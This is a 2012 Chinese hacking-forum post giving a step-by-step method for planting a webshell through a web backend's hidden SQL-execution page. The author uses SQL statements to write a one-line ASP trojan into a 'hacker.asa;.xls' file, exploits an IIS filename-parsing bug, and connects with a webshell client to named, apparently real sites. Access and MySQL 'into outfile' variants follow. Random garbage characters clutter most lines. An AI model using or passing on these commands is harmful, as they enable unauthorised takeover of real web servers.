好不容易进了后台,发现啥上传啊。备份啊多木有。- n& a" o2 w5 r* m# C0 d: b' Y5 c
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
. [# _ r0 G9 i& x文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
/ g4 J6 ^- i u8 j然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
2 \! h" }: X$ ~; l, k1.create table cmd (a varchar(50))3 Y( a/ j& m( w2 F$ S
2.insert into cmd (a) values (‘‘)' [8 y+ y: i) |; e8 [. N$ \/ x
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd0 m$ d& y( o l* Y0 n" U$ N
(把表cmd的内容导出为物理路径的一个EXCEL文件)! j& S, ?8 {3 H0 l
4.drop table cmd
/ S1 ?" ]3 w. u% e利用IIS的BUG成功拿到了WEBSHELL。6 g2 \ q" [( ~, l# G
2 }. t: F# M! L3 q( u1 Z直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
& P# d$ \7 V4 ?+ a/ \# k& B
8 ?5 o+ j, U, F' d5 w6 W1 J SQL语句意思解释:
$ C6 s g# x# \& o" z+ F 第一句
# ^8 z; T% q' O 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为500 Z6 d$ K; o6 A
! r3 ~, E7 S& R9 {: J# \ S 第二句0 {5 @2 z. q1 ?3 |/ x
在表cmd的a字段插入一句话木马
F5 d# M1 Q5 r" |. R 第三句
; M3 L f c7 y" M. n 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件1 ]7 f+ O! C$ I+ d
0 G' P- }! k% P- k% N) }7 X0 R
第四句: ?: P3 w5 G: w9 Y/ p4 I+ X _1 P
删除建立的cmd表
; x8 e4 Z9 _+ A! y6 f
& N6 n/ q3 x; i0 y1 v, a9 ]& @ 以下内容为测试:
% D/ Y5 ] K1 h, }9 l Access利用后台SQL执行命令功能导出WebShell:9 K( i; M% Q4 _2 u5 V- H
这个更简单:! W# v& s0 t/ n& c5 F( @. v: q
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
6 l+ Q% v i) H1 {! z/ W 或者& u2 e7 d$ _/ W. v; Z
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
, X @6 ~ D: O: \; }, A# ]" f) K ^. j2 D
后台有执行SQL语句功能(vote为已知表段)5 `6 @1 [' |6 r
希望对大家有所帮助拿shell的又一个思路
( n, Z, N/ w7 T |
发表于 2012-9-13 17:53:58
收藏
支持
反对